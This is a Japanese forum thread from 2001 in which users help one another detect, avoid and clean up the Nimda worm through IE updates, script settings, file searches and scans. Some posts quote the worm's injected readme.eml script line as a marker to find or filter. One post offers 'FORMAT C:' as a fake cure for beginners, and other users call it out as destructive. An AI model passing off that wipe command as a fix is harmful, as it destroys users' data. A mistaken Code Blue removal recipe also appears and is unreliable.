OSごと入れなおすいい機会だと思ってます。
お心遣いは感激しました。どうもです。

>>486
ありがとうございます。
幸いオンラインチェックでは問題ありませんでした。

ところでもし感染してる場合、今度のウイルスでは
メーラーを開いたとたんにアドレス帖にはいってるあて先に
ウイルスメールを勝手に送りつけるのでしょうか？

>>490
２ｃｈの他の板、文字化けしない？
コピペはできる？
漏れのは、できないんだよ・・・

日テレでやってるよ

今、IE5,5SP2　にして、ノートン先生の定義を最新にしましたが、
ＯＥ起動して、ワームが一杯来てたら、どうすれば？
削除すればいいのかな…？
(怖くてまだＯＥ立ち上げてない)

>>487
レスありがとうございます。「開いています」と出ますが開けません。他に原因があるようなので、他板
できいてきます。

で、もとからIE5.1sp2 IE5.5sp2 IE6の人は安全なのね？

>>500
サイト見たら即感染→あぼーんが避けられるだけ。
ダウンロードしますか？とかいう画面が出る。(出たらキャンセルだぞ)
不安ならJacascript切っとけ。

nanasisanさん(さんつけたら変？）、いろいろありがとうございます。
とりあえず大丈夫そうなのですが
ノートンでスキャンしたらメモリ不足でフリーズ。
再起動になりましたが問題ないようでした。
ＹＢＢの共有の話題にもびびりまくりでしたが少し安心しました。

×Jacascript→○Javascript　　鬱だ氏のう・・・

あのう、今回のウイルスはＭａｃにはなんら被害を
及ぼさないんでしょうか？
ガイシュツだったらごめんなさい。

過去ログ読んできたんですが似たような書き込みが無くわかりませんでした…。
どなたか教えてください…。

>>504
うん

どうしたサンスポ
http://sanspo.com/

ＩＥ６で、どうやったら文字化けせずに２ｃｈを見れますか
「スレッド一覧」が文字化けしてしまうので、下がっているスレがみれません。
誰か助けてくださーい・・・

JOKE_BUTTONSていうウィルスが見つかったんですけどどうすればいいですか？

ダメだ・・・
5.5ＳＰ2入れようとしてもタスクスケジューラの署名のとこで
いつも回線切られちまうよ。
ここクリアできた人はどうやったか教えて欲しいっす。

おいテレビニュースみたぞ。何だか変なウィルスが広まっているらしいな。
サイバーテロだとか。
危険すぎるぞおい。

>>506
ありがとう。

＞＞５０８　おれなんか過去ログみようとすると、
ファイルのダウンロードウインドウが出るんだけど。

検索で「名前」、「含まれる文字列」、「探す場所」とかどうゆう設定にすればいいのですか？
「名前」は僕の名前ですか？
「含まれる文字列」というところに.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』
を入力すればいいですか？『』←これもいりますか？
「探す場所」はどこですか？

今バージョンアップしたんですけど
更新情報「；ＳＰ2；」になてたらOKなんですよね。

>>508
とりあえず、こっちいってみれば？わからんが
http://teri.2ch.net/test/read.cgi?bbs=accuse&key=1000645308

IEアップデートできない…。全然DLできない…。泣きそう。
セキュリティのjavascript関係全部無効にする、だけで
なんとかしのげるでしょうか？
メーラもoutlook expressは使うのやめたほうがいいですか？

>510
今5.5なの？
タスクスケジューラー停止してインストするとか。

ダメな奴はネスケ使え。

>>516
ありがとう！どうにかなりそう！！

みんな環境にやさしいWebBoy for DOSを使え( ﾟдﾟ) ﾄﾞｽﾄﾞｽｴ!
http://www-6.ibm.com/jp/pspjinfo/webboy/

>>518
5.5SP1です。
タスクスケジューラ停止してます。
過去ログ読んだら同じとこでつまづいてる人いますね・・・

ネットにつないだ瞬間、！！オメデトウ！！どうのこうのと
画面いっぱいに英語で、でてしまうのだが・・・なんでしょう？

＞前回のインストールが完了してません
＞IEのセットアップを実行する前にコンピューターを再起動して、
＞そのインストールを終了してください。
＞セットアップは終了します。

と表示され、SP2もIE6もインストールに移る事すらできません
何度再起動しても同じです。
どういうわけでしょうでしょう？
誰か対処法がわかる人いましたらよろしくでし。

＞523
おめでとう。あなたが100万人目の感染者です。

loadme.exeでなくload.exeだった┐(´〜｀;)┌

MSNサイトってそもそもJavascript ONにしないと何にも見えないじゃん。

Ver6.0じゃダメなのか？不安だ。

あのさー、ネタでも何でもなく、素直にネスケ使えばいいじゃん。
不具合でたり、時間かかったり、面倒なだけだよ。
どうせみんな雑誌の付録ＣＤ−ＲＯＭの1枚ぐらい持ってるでしょ。
５分もあればインストールできるんだから。
何時間もあくせくするよりなんぼかましだよ。

>>527
MSNがそれだけ糞サイトということですよ（藁）

>>529
わかった。そうする。
ところで、どのVerがお勧め？
(寝助、使った事無いからな〜)

MNSに逝く人って、何の用事があって逝くわけ？

Windowsの検索でor検索ってどうするんだっけ？

ろくに自分とこのホームページのセキュリティも確保できないような
ＭＳＮがＪａｖａＳｃｒｉｐｔオンじゃないと見れないようなサイト作るな( ﾟдﾟ) !

スーパー初心者のためのＭＳＮウイルスくれ。

に見えてしまう（鬱

こーゆー騒動のときWebメールって便利だな

>531
4.75か4.78でいいのでは？
おれは4.75使ってるけど。

>>537
さんくす。家中のCD-ROM漁ってみる。

>>531
537に同意。
私は4.78使ってます。

>>532
MNSに逝く人って？

ver4.78に一俵

http://www.mns.org.my/
マレーシアの自然を守ろうね。

ネスケの4.xxってCSSの解釈がボロボロじゃなかったっけ？

かといって6.xは重すぎて使えないし…。

>>532
MNSには逝かんが。
単にセットアップデフォルトを変更してないだけでは。

……って、デフォルトは/homeなのか？

>>542
たしかに多くの人は逝く用事ないなこのページ（ｗ

>>544
IE使えよ。

IE6を入れたけど、設定は何もいじらなくて
いいのかな？

問題が発生したため、Microsoft Internet Explorer を終了します。 ご不便をおか
けして申し訳ありません。

↑みたいなメッセージがでてきてサイト見ようとしてもすぐウィンドウが閉じちゃう
んだけど、どうなってんの？
以前5.5落とした時も同じエラーメッセージがでて使えずにずっと5.0使ってる
んだけど…

>>515
うちも同じ表記だったから大丈夫でしょ。
ちなみに１０日前に、５．５ＳＰ２入れたばかりでした。

>>514
かわいそうなのでレス。
『*.eml』『readme.exe』『MEP51B3.TMP.EXE』 を「名前」にいれます。
『』←これはいりません。
「探す場所」はC:です。

今日の朝、思いっきり感染サイトが掲載されていたけどな（まらまら

？

えっと。毎週水曜日に同期をとらなくてはいけないページがあるんですが、ウィルス対策をしてると無理ですよね
アクティブXもjava関連もダウンロードも無効にしてると、同期どころかページも表示されませんよね・・・・
おとなしく寝ろって事ですか？いつになったら大丈夫になるんですかね？結局WEBを見ないとわかんないですよね
２４時間体制でインターネット関連情報を流してくれるTVがあるといいんですが・・・

＞問題が発生したため、Microsoft Internet Explorer を終了します。 ご不便をおか
＞けして申し訳ありません。

ﾊｹﾞｼｸﾜﾗﾀ
こんな低姿勢のメッセージMSが出すわけないもんな
>>549
質問するならマナーくらい考えろや

すみません、この掲示板いじくってたら今readme.exeをダウンロードしますか？

って出てきたんですけど・・・これって

まだ無事ですか？

>>556
他にコッソリと別のIEが立ち上がってると思われ

ウイルスバスター２００１のパターンファイル番号は、現在「９４２」です。

ノートンアンチウイルス２００１のパターンファイルは、９月１８日版で定義数５４００５個です。

そんな事よりみんな、ちょいと聞いてくれよ。スレとあんま関係ないけどさ。
このあいだ、ウィンドウズアップデートのサイト行ったんです。アップデートの。
そしたらなんか人がめちゃくちゃいっぱいでＤＬないんです。
で、２ｃｈに戻ったらなんか警告出てて、ＷＥＢを見るだけで感染するウイルス、
とか書いてあるんです。もうね、アホかと。馬鹿かと。
お前らな、ウイルス如きで普段来てないにアップデートサイトに来てんじゃねーよ、ボケが。
ウイルスだよ、ウイルス。
なんか親子連れとかもいるし。一家４台で感染か。おめでてーな。
よーしパパＩＥ６もＤＬしちゃうぞー、とか言ってるの。もう見てらんない。
お前らな、ウイルス送ってやるからメアド教えろと。
アップデートってのはな、もっと殺伐としてるべきなんだよ。
回線の向こう側に座った奴といつ喧嘩が始まってもおかしくない、
ハクるかハクられるか、そんな雰囲気がいいんじゃねーか。初心者は、すっこんでろ。
で、やっと繋がったかと思ったら、隣の奴が、ネスケにしろ、とか言ってるんです。
そこでまたぶち切れですよ。
あのな、ネスケなんてきょうび流行んねーんだよ。ボケが。
得意げな顔して何が、ネスケにしろ、だ。
お前は本当にネスケを使いたいのかと問いたい。問い詰めたい。小１時間問い詰めたい。
お前、自分のヲタサイトがネスケにしか対応してないだけちゃうんかと。
アップデート通の俺から言わせてもらえば今、アップデート通の間での最新流行はやっぱり、
ＩＥ５．０１、これだね。
ＩＥ５．０１アラブ語フォント同時ＤＬ。これが通の落とし方。
アラブ語フォントってのはアラブ語が読める。そん代わりＤＬに時間がかかる。これ。
で、それに韓国語フォント（ハングル）。これ最強。
しかしこれを落とすと次からＣＩＡと２ｃｈねらーにマークされるという危険も伴う、諸刃の剣。
素人にはお薦め出来ない。
まあお前、１は、新型ウイルスでも食らってなさいってこった。

Ｗｉｎユーザーは大変だね。

>>557さん

え、どう言う事なのでしょうか？

既に感染していると言う事でしょうか？

>>549
わしのもです！IE5.5⇒6bにしてもなる。なんでやろな？

>>559
ウイルスverﾜﾗﾀ

>>555
そうですね。読み返してみて自分でも問題あるなって思いました。すみません。

いろいろ試しているのですが、どうしてもだめみたいです。
よろしければどなたか教えていただけないでしょうか？

>>559
コピペワラタ。
〜のかと問いたい。問い詰めたい。小１時間問い詰めたい。
ここがいちばん面白いね。

>>559
めたくそ藁ったぞ

>>559
これのコピペっていつも面白いこと考えるよね。
ほんと関心する。

あの・・　IE5.5SP2をDL＆installしたんですが、
IEのversionが5.51.4807.2300ってなってるんです。

ver 5.50.4807.2300っていうのは他の解説サイトにも載ってたんですが、
これって大丈夫なんでしょうか？
ちなみにOSはWin Me です。よろしくお願いします。

>>567
ワシも好き

でどんな症状でるの？

>>561
ここが問題なのではなくて、どこか別のサイトが問題てことです
IE5.5SP2か、IE6でないなら感染してるはず

>>561さん

そうですか、どうもすみません。ＳＰ２入れたばかりなので心配でして。

ちょいと聞きたい。
ＩＥ５．５−ＳＰ２以下の人って
ＪＡＶＡ＆ＡｃｔｉｖｅＸをＯＦＦってても
感染するんでしょうか？

>>572
JavaScriptを切ってれば大丈夫。

<script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>
これを起動できないようにするためにJavaScriptオフ。

>>573
かたじけない

IE5.0で昨日MSN見たけどなんの感染もなかったよ。
多分いつも「こいつアンインストールしようかな？」と思ってた
メガネが似合うノートンのオヤジがPCを守ってくれた。

IE6導入したら「Д」が太字で表示されるようになったんだけど…

ところで「スクリプトによる貼り付け処理の許可」って何をするものなんですか？

>574
またエロいタグ入れてんな〜これ。
でもjavascript切ったら見れるサイトかなり減るよね。

Windows2000severに*.emlファイルが数百個出来てます。
削除してもまたいつのまにか作成されています。
どうしたらいいんでしょうか？誰か助けて〜！！

>>581
フォーマット

AAｽﾞﾚるぞｺﾞﾙｧ！って人や
顔文字が不細工になったじゃねーか！って方はﾈﾄｽｹｰﾌﾟに移行しましょう
ftp://ftp.netscape.com/pub/communicator/japanese/4.78/windows/windows95_or_nt/complete_install/cc32d478.exe

95ユーザでSP1までしかアップデートできないんだけどマズイですか？

>>582
絶対いやだ！再インストールめんどくさいです。
っていうか初期化するしか対処方法ってないんですか？

>581
なんでW2Kseverなんか入れたのって聞きたい。。。
そんな人が観戦するなんて信じられない〜〜
OSを再インストしてください。。。

悲惨な>>581

×Windows2000sever
○Windows2000server

検索しても引っかからなかったから、取りあえずは大丈夫かな…。

>>586
会社のサーバーなんですよ。
クライアントが感染してサーバーも感染・・・。助けて！！

感染すると、どんな症状になるの？

IE5.5SP2でjava関連とかダウンロードとかOFFにしてると
同期って出来ないんですか？

>>590
自分が踏み台になりたくなかったら、駆除ツールを待つ前に
速やかに再インストするしかないのでは？

IE6導入したら「Д」が太字で表示されるようになったんだけど…
これは直せないんでしょうか？

＞590
会社に管理者いないの？
W2Kserver入れてるなら対処法も解るでしょ？
再インストの要領のいいやり方だってあるよ。
どんなアプリが入ってるかわかんないからアドバイスなんて出来ない
あなたが、管理者じゃなかったら管理者に聞いてみるのが一番。。。

>594
フォント変えてみたら？

>>594
ほんとた｡(ﾟДﾟ)

２ちゃんの顔文字が表示できないブラウザなんてｸｽﾞだ、

（°д°）藁

更新バージョンのところがＳＰ2になってればよいわけれすかあ？

(´ー｀ ) これの目が怖くなってませんか？

なんかブッシュのAAがおかしいとおもったらIE6のせいか。

>>590
MSに「MSNのせいで感染した裁判だぁー」って言え。
まずそこからスタート

# 帰ってきたよん
>>600
そうです。ただしウイルスが入ってこられないようになっただけなので、
念のためウイルスチェックしましょう。

（*´ー`)

おみとろんにて、
<script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>
をカットすれば安全

かちゅーしゃとかﾊﾞｸﾞ､ﾄﾞｰﾅﾂ等タブブラウザ使えば
AAが表示できると初心者向けスレでいわれたがウソなのか？

たらこ唇みたいで笑える(ﾟДﾟ)

あの。。５．５ってよくクソブラウザとか言われてません？
（理由は全然知らないんですが）
自分今、５．０１ＳＰ１なんですけど、５．５より
５．０１ＳＰ２にしといた方が無難でしょうか？

ひろゆき？？

やはり再インストしかないのか。。。鬱だ・・・。
駆除ツールでないのかな・・・。

（σ´一｀）σ

>>590
いちおうマジレスしておこうかな。
まずはウイルスが入らないようにするため、クライアントとサーバはそれぞれ
ウイルスチェック。もちろん全てのファイルを対象にするのと、パターンファイル
は最新に。あとネットワークケーブルはそれぞれ外しておくように。

もしウイルスチェックを購入してないのなら今すぐ（まだ店によっては開いてる
ので）購入した方がよい。

ウイルスが駆除できたら、IEの最新バージョンをインストールする。
IE5.01SP2かIE5.5SP2かIE6.0。どれでも良い。

あとはサーバ側はhttp://www.microsoft.com/japan/security/を参考に
IISのセキュリティパッチを出来る限り入れること。

ウィルスチェックってどうやるんですか？

ＩＥ６ダウンロードのついでにOutlookとメディアプレイヤー
バージョンうｐしたら、起動がめちゃめちゃ早くなった。
漏れだけ？

・・・どうでもいいけど
アナログだと２時間もかかる（＾＾；

つか　とりあえず２chしか見ないし　エロ画像落としたりしないし
大丈夫そうだし何もしない！

(;´Д`)　５，５にしただけでこれがおかしく表示されるようになったので
５、０１に戻した

>>614
ウイルスチェックのソフトウエアはインストールしていないのか？
Windows標準の機能じゃないんで、インストールしていなければ不可能。

>>613
ありがとうございます！
IISパッチ入れときます。

買うんですか？MEですが、標準であったような・・・気のせいかな
あとWEB上のページの同期をとっても平気なの？

パッチ入れても観戦後だと・・・まっいいか。。。

>>611
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]
499 ：感染しちゃった人へ ：01/09/19 04:02 ID:NRln1zEY
Code Blue ワームをコンピュータから削除するには:

Regedit を使用して、HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run レジストリ キーを見つけます。
C:\svchost.exe に対するレジストリ エントリを見つけて削除します。
C:\svchost.exe というファイルを削除します。
システムに C:d.vbs というファイルが残っていれば、それを削除します。
コンピュータを再起動します。

http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html

>>616
とりあえずjavaとjavascriptとActiveXだけでもオフにしておけば良い。
見られないサイトとか出てくるかも知れないけど、安全とトレードオフ。

>>620
パソコンによっては買ったときにインストールされてるよ
マニュアルみてくれ

ＡＡがずれるから駄目って言われてるんですか？＞５．５
それ嫌だから５．０１ＳＰ２にしよっと。

>>611
CodeBlueじゃなくてニムダだと思いますけど・・・。

>>620
Me標準だと5.5くらいだったと思うので、とりあえず最新バージョンをダウンロードしてインストール。
無償（プロバイダ料金と通話料は別）でダウンロードできる。

>>624
はい。

>>622
でした。

>>611
すみません。Code　Blueの対策でした。
http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html

>>618
トレンドマイクロのオンラインスキャンじゃダメ？

ME、IE5,5SP2です

>>631
OK。今日の午後以降ならちゃんとnimdaを検出できるパターンファイルになっているので。

>>622
うちの、社内のWEBサーバー感染したけど、Code Blueとは全然症状が違うよ。
やっぱり、ニムダの修復方法を取らないと。
でも、まだ発表されてないし、恐らく無理で再インストになりそう。

>>632
IE5.5SP2ならすでに対処済み。念のためウイルスチェックして引っかからなければ完了。

JavaScriptを切るってどうやるんですか？

ありがとうございます

まだ感染後の削除方法ないのか・・・

nanasisan、朝から働きどおしだ。NYの消防士みたい。
ガムバレ！(って言うしかないへたれな自分)

5.01sp2なんだけど、どうなのよ？

>>639
俺ってこのまま明日まで眠れなかったりして(藁
そしたら今晩中にAnti-nimdaソフトウエアでも作って公開した方が早いかもー、
とか思いつつある。

ノートンでウィルススキャンしたらNIMDA検出されました。
ノートンなら駆除できるんですか？

スーパー初心者スレだからあんまり言いたくないけど、
少しは過去ログ読もうよ。答える方も大変だって。

>>633
そうなんだ
貴重な情報、感謝

>>642
とりあえず駆除させてみてください。たぶんいけるはず。
駆除したら再度スキャンして、引っかからなければOK。

>>640
問題なし。ただし昨日今日にバージョンアップしているのなら、念のためウイルスチェック。

java,javascript,ActiveX,レジストリ エントリ,インストール,
IISパッチ入れる・・・・

このスレで出てくる言葉はほとんどわからない。
だから、トップにあるリンク情報を開いても、
なにをいっているのかさっぱり分からない。

「どこどこのお店に行って、『〜〜をください』と言って、
それを左から何番目のキーを押して何がでてきたら、どの
アルファベットを押すと何がでて・・・・」ってないい方は
きっと誰もしてくれない。
勉強したいが、何を読んでいいのか分からない。
『これ一冊で、パソコン博士』ってな本はないだろうか。

>>642
駆除はまだできないんじゃない？

261 名前：名無し募集中。。。 ：01/09/19 20:07
http://61.208.221.9/

>>646
慣れればわかるＹＯ
セキュリティーの本読めばすぐ分かるかもＹＯ

>>645　>>647

レスありがとうございます。
早速、やってみます。

実は後穴が一番恐いYo!

　だあ！　派遣先め、毎週重要ファイルだけはバックアップ取れって
言ってたのに、全く取ってない奴多すぎ。
　奴らは何のためにシスアドに金払ってるんだっての。
　つうわけで仕事にならんし、リセットアップまでやってやる義理(契約)
はないから、リセットアップ後のセキュリティ変更だけ教えて帰ってきた。
　てなわけで久々のアレ逝くか……

俺も全然分からん、だからとりあえずIE6入れといた。

ちょっと強引だが俺のID

MSずるむけロリエ

>>642
ゴメン。駆除っつーか削除だった。ファイルの中からウイルス部分だけ
消すんではなくて、ファイルごと消すしかないと思う(__)

>>646
そういうあなたにおすすめ。
http://windowsupdate.microsoft.com/
※ javascript切ってると見られないので注意。

ここで表示される「重要な更新」のところを片っ端からチェック入れて「ダウンロード」を押してください。
ただし、ここで入れても防御壁にしかならないので、既に感染してしまった場合は意味がないので注意。
感染しているかどうかを調べるにはウイルスチェック。

>>636
>>243をみてくれ。
しかしSP2にするのが一番早いと思うけど。

>>646
他はともかくとして、
「インストール」がわからんってのは如何なものかと・・・

状況報告ver1.05(前編)
対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
　→java関連とダウンロードのファイルのダウンロードを不許可。

現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
5.感染したPCはCドライブをネットワーク共有する。
6.システムのスローダウン
7.リソースの消耗
8.他のファイルに潜伏する。

メールによる接触時
ウィルス感染したメールを受信したとき、readme.exe はwav（音声）ファイルになりすます。

LANによる感染
　社内に一人でも対策してないひとがいてノーパスとかにしていた場合
　LANの共有フォルダを使っても自己増殖する。

感染鯖
　ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
が追加される。

状況報告ver1.05(後編)
感染の有無の確認
1.●トレンドマイクロ　オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm

2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
　*.emlが大量にHITした際は確定。
　ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
　そうでないときは後者2個を削除して様子を見る。
　といっても後者二つを消したからウイルスが消えるわけではない。
　ファイルのDLを拒否してもファイルが作成されたという報告
(多分一時ファイルに残っているだけだろうが)があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)


感染時の対応
　感染してしまった後は、アップデートしても無意味。
　とりあえず感染を拡大しないようにウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテンツを回らない。

　感染前に対応ブラウザにして、DL拒否しているのにスキャンで
感染しているというときは多分『インターネット一時ファイル』
に残っているので、気になるならツール→インターネットオプション→
全般→インターネット一時ファイル→ファイルの削除

　ワクチンできたよとかの情報など、追加のフォローさらに宜しく！＞ALL

IE6.0を使っているんですが、Explorer exe.ってexeが付いているけど
感染しているのですか？おしえてください。

5.5sp2へのアップデートのダウンロード中に
「タスクスケジューラ」のところで止まってしまう人いましたよね？
解決した人いますか？

>>652
まぁ、そういうもんだよ。重要なファイルが消えてしまったりするような
痛い目を見ないと何もしないってのは少なくとも日本国内では標準的。

アメリカのテロんときもそうだけど、対岸の火事くらいにしか見てないみたいだ。

＞660
一緒にラウンジに帰りましょ&hearts:

>>660
　『.exe』は実行ファイルって意味。
　アプリならどんなもんにでもあると思ってくれ。
　問題なし！

>>660
それだけでは何とも言えません。わからないようならウイルスチェックを行いましょう。
1.●トレンドマイクロ　オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm

ワクチンが出きるまで2chにひきこもってよう・・

＞666
かちゅ〜しゃでね！

>>661
セーフモードで起動して、C:\Windows Setupなんとか
というディレクトリ（手元に確認できる環境がないのでゴメン）に
ie5setup.exeがあるはずなので、そこからインストールし直すと良いはず。

>>664-665
サンキュー！助かりましたぁ。（ほっ）
>>663
逝け

>>661
ＩＥのセキュリティーを中にしたらダウンロードできましたよ。
あとウィルスソフトも中止にして。

何故、ウイルスで盛り上がってるんですか？

＞６６１
過去ログにありましたね…ちょっと見てみます。

＞６７０
中にしてあるんですけどね…

間違えちゃった。
＞６６１→＞６６８でした。

>>671
　こいつが繁殖力と感染経路が伊達じゃない未曾有のウイルスだから。
　下手するとWEBコンテンツ見ただけでOUTレベル

>>659
>とりあえず感染を拡大しないようにウイルス対応ソフトのHP以外には行かず、
>ワクチンが出来るまで他のWEBコンテンツを回らない。
いや、回線を切るか、再インストールをお勧めします。
-------------------------------------------------------------------
実行されと、正当なWindows DLLとRICHED20.DLLを置き換え、system.iniを次のように
改変することによりシステムをフックします：

Shell= explorer.exe load.exe -dontrunold

ワームは自分自身を%Windows System Directory%\load.exe とWindowsテンポラリ
ディレクトリにMEP*.TMP.EXEというテンポラリファイルとしてコピーします。
ワームは、新しいメールアドレスを見つけるためにMAPIを使って受信ボックス内
のメールを読みます。このMAPIの機能は、Outlook (Outlook Express)でサポート
されています。ワームは、本文の無い、ランダムな件名のメールにワーム自身を
添付し、独自のSMTPエンジンを使ってメールを送信します。
受信したとき、readme.exe はwav（音声）ファイルになりすましています。
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]
-------------------------------------------------------------------
・MSNのOutLookメーラー使っている方は、他のメールソフトを使用することを
　お勧めします。私はBeckyを使用してます。
・C:\WINDOWS\system.ini
　のファイルの中に、Shell= explorer.exe load.exe -dontrunoldがあれば、感染してます。

IE5.5SP2にしたら動作が快適になったよ
今回の騒動で得した気分

どうよ。そう思うだろ？
内定もらって、何か変わったか？
アメリカでテロがあって、お前に被害があったか？
これからの人生に面白みがあるか？
くだらなくて、退屈なことばっかりだろ？
生死、セックス。それだけ。あと金か。それだけだ。
臭いこと考えてる奴は一刻も早く死ね。

スキャン開始するも、、、。
途中で強制終了、、、
こんなんでました
SCAN32 のページ違反です。
モジュール : MCSCAN32.DLL、アドレス : 0167:004d103f
Registers:
EAX=00000000 CS=0167 EIP=004d103f EFLGS=00010206
EBX=00000000 SS=016f ESP=0407d1b0 EBP=0407d780
ECX=000000af DS=016f ESI=00000000 FS=4767
EDX=0000001c ES=016f EDI=03dfcad6 GS=0000
Bytes at CS:EIP:
8b 08 ff 51 1c 39 c2 76 04 31 c0 eb 54 83 7c 24
Stack dump:
000000af 0407d7b6 00000000 0407dc20 004da228 00000000 03df019c 0407d798 10000763 00004000 00000061 00000100 00000000 00000000 00000000 00000000

ＩＥ６最新版登場しました。

http://www.forest.impress.co.jp/article/2001/09/19/ie6jp.html

⇒感染したPCはCドライブをネットワーク共有する。

Cドライブがネットワーク共有しているか確かめるにはどうすれば
いいんでしょうか？
モノ知らずですみません。

うわあ、ＩＥ5.5+SP1だよ。
まともに喰らうじゃん。
はあ、とりあえずウィルスチェックするか。。。

既出かもしれないけど、おしえてください！
友達がシマンテックのソフトで駆除したって言ってましたが、今回のもできるの？

>>678
McAfeeかな。ウイルススキャンをインストールし直す（アンインストールして、再度インストールする）と解決する可能性がある。

低姿勢のメッセージ出るじゃねーか
テメーがマナー考えろや

>>683
マジで有り難う。やってみます

>>682
>>468に書いておいた。

>>675
　了解
『むしろ自他の被害の拡大を考えるならOSから入れなおした方がいい』
を追加します。

＞＞６６１
あんたもか？
わしもなんど５．５ＳＰ２ダウンロードしてインストールしようとしてもタスクスケジュ−ラの署名がどうたらこうたらのところで止まってしまって何度もやり直しになった。
時間の無駄なので６．０にしたら問題なかった。しかもきわめて快適じゃ
だだしＩＳＤＮでダウンロードとインストールに１時間くらいかかったが・・
ｙａｈｏｏの掲示板にもＳＰ２にはタスクスケジューラに問題あるとカキコしてる人いたから何かあるのかもしらんな

セキュリティーに気を配らない人を
対象にしたウイルスかあ。

ウイルス製作者はヤナ奴だな。

>>684
　『低い姿勢』はMSのXP戦術のウリらしいです。
　CMでもやってます(藁)

>>689
っていうか、狙ってやった感じがする。
サーカムが流行ってたときをさけて投入しようとしたけど、
テロが起きて、話題独占できないから一週間待って････。ッて感じで。
考えすぎかな？

>>686
読んでもわかんないー。私は>>682だよ？

６６１>688
やはりダメみたいです…
６にしようかな…ADSLなのでそんなに時間かからないと思うんだけど…
でも６は別の問題が後で発見されそうで怖い…

あー面倒だ…いっそネスケにするかな…

掲示板のスクリプトも最新になったね。

質問なんですがp2pソフトつかってファイルのやり取り
する場合、感染する危険性あるんですか？相手がウイルス喰らってたりしたら。

ウイルスのなおしかたおしえるよ、
DOSモードで起動して
FORMAT C:
と打ち込んでください。
あとはすべてYESを選んでください。
これで大丈夫です。

>>692
>>686は>>680に答えてるつもりだろ。それくらい理解しろ。

>>696
こらこら

ごめん、確認させて。
ＳＰ２入れたらjava onにしても「変なファイル落としますか？」
っての気をつければいいんですよね？
java offなら、それすら表示されないでより安全なんだよね？

>>696
　全部消えるわ！（藁

>696
スーパー初心者スレと銘打っているのだから、シャレにならない事は止めようね。

>>680
スタート--->プログラム--->アクセサリ--->コマンドプロント
c:\>ipconfig
Ethernet adapter ローカル エリア接続:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : x.x.x.65 <---ココ
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : x.x.x.126

もしくは
C:\>netstat -an
Proto Local Address
TCP x.x.x.65:1868　　<---ココ

のアドレスが自分のアドレスです。おのアドレスをIEのアドレスバーもしくは
フォルダーのアドレスを書くところに

\\192.115.10.3　　　　　　　

という風に自分のアドレスを入れてください、共有されていたら分かります。
なお、共有されていると、フォルダに手のマークが出ているので一目かと思います。
仮にフォルダ上で右クリックして、プロパティを選択すれば、共有するかどうかの
選択項目があるかと思います。（WIN2000）

>>693
いまのところＩＥ６．０極めて快適だけど・・

>>697
補足感謝。どうも疲れてるらしい・・

ついでなのでお返事。
>>682
検出は出来たけど、駆除は時と場合によるらしい（現状は少なくとも）。
あまり期待しないほうが良いかも。

初心者はDOSプロンプト開かないでしょ

えっとまだ質問出てナインみたいなんですが
ＩＥの5.00.2614.というバージョンは感染しないのでしょうか?
ＷＩＮ98ＳＥをいれたデフォの状態なんですけど。

一応調べたら現時点では感染してないみたいなのですが・・・

>>699
javaではなくて、javascriptです。
IEだと「スクリプト」のところ以下。

>>696
店頭ので試したらパソコンがあぼーんしましたが何か？

本スレと関係ないかもしれませんが　”sage.exe”　って何？
c:\system でヒットしたよ。
なんか怖いよ〜
助けてよ〜

>708
ネタだろうけどﾜﾗﾀ

>>706
感染します

\\127.0.0.1

IEのアドレス、もしくは、フォルダのアドレス欄に\\127.0.0.1でもいいです。

本スレと関係ないかもしれませんが　”sage.exe”　って何？
c:\system でヒットしたよ。
なんか怖いよ〜
助けてよ〜

今、5.5sp2入れたら、今までどうやっても起動しなかった
Outlook Expressが使えるようになって感激した。
Ｆ士通のサポートセンターでもお手上げだったのに…。
んでもShuriken Pro買っちゃう前に直って欲しかったな。

>709
２ちゃん(ひろゆき)にＩＰが筒抜けになるウィルスです(嘘

>>713
まず真っ先に、２ちゃんねるとは無関係です。
何かの省略形でsageになるだけです。
Windowsのシステムファイルなので、ウイルスの直接的なファイルではありません。

心配ならオンラインウイルススキャンを。

>>707
あ、はい。わかりました。
5.01ＳＰ２にしたから、もうそこを有効にしてもＯＫですよね。
ありがとうございました。

>>704
ありがとう。友達に伝えときます。
>>697
こっちは初心者でパニクッているの！そんなことまで頭まわんないよー。

>>706
がいしゅつです。
あなたのは「IE5.01SP2」以下、つまり放置してれば感染します。
今すぐアップデートしてください。

>>709
お、俺もヒットした･･･場所は、c:\windows\system　だった。

Task Scheduler Sage Compatibility っていう正式名称で、
バージョンは　4.71.1972.1　だった。
IEのアップデートしたときのファイルかもしれない。

>>713
マウスの右クリック--->プロパティ--->バージョン情報
みてみろよ。

>717
うｐした後でも知らないファイルを｢ダウンロードしますか？｣と聞かれたら
キャンセルしなければ意味はないからね

×　>>709
○　>>713

ありがとうございます。
今から急いでアップデートします。

今日初めてパソコン買ったぜベイベー

IE６をダウンロードして使ってます。
でも、「IE６はバグだらけだからやめとけ」という書き込みを
見たのですが本当ですか？
私は今のところ問題はないのですが、、、

>>702

それなら
\\127.0.0.1\
としたほうがラク。

ところで、うちで試してみた感じだと、
どうやっても症状でないんだけど、そういう構成もあるのだろうか。

Windows2000 Professionalで、readme.exe実行しても、
